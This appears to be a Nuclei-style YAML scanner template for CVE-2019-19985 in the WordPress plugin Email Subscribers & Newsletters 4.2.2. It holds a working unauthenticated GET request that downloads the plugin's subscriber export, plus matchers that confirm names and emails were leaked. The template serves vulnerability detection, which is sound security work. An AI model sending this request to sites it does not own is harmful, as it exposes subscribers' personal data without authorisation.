34 lines
954 B
YAML
34 lines
954 B
YAML
id: CVE-2019-19985
|
|
|
|
info:
|
|
name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
|
|
author: KBA@SOGETI_ESEC,madrobot,dwisiswant0
|
|
severity: medium
|
|
description: The WordPress plugin, Email Subscribers & Newsletters, before 4.2.3 had a flaw that allowed unauthenticated file download with user information disclosure.
|
|
refrense: https://www.exploit-db.com/exploits/48698
|
|
tags: cve,cve2019,wordpress,wp-plugin
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- Name
|
|
- Email
|
|
- Status
|
|
- Created On
|
|
condition: and
|
|
part: body
|
|
|
|
- type: word
|
|
words:
|
|
- "Content-Disposition: attachment; filename=all-contacts.csv;"
|
|
part: header
|
|
|
|
- type: status
|
|
status:
|
|
- 200 |